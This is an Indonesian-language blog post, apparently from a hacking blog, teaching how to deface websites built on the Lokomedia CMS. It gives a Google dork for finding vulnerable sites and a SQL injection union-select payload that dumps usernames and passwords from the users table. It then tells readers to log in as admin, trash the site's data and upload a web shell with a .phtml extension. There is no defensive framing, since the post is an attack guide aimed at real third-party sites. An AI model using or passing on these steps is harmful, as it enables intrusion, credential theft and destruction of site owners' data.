SEMUANYA BERAWAL DARI MIMPI

Cara Deface Website dengan SQL Lokomedia

Mau Tau Kan Gimana Deface SQL Lokomedia??
Langsung Simak Yak??

=======================================
Dork: inurl:hal-tentang-kami.html

eXploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
=====================================

1. Dorking Ke Google.
2. Pilih Web Target Dan Masukan Exploitnya
Contoh: target.c0li/hal-tentang-'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+kami.html



3. Vuln?? Kayak Gambar Di Atas. Atasnya Ada Tulisan Username Loginnya
4. Tekan CTRL+U. Cari Username dan Password Yang Belum Di Hash.




6. Cari Admin Loginnya Bisa Di Baca Di Post Kami Sebelumnya 
https://sefster-it.blogspot.com/2017/04/cara-mencari-admin-login-di-website_14.html
7. Jika Udah Ketemu, Login Aja Dan Obrak Abrik Aja Datanya
8. Jika Mau Upload Shell Biasanya Harus Berformat .phtml Jika Yang Lain Cari Tahu Aja Sendiri 

No comments:

Post a Comment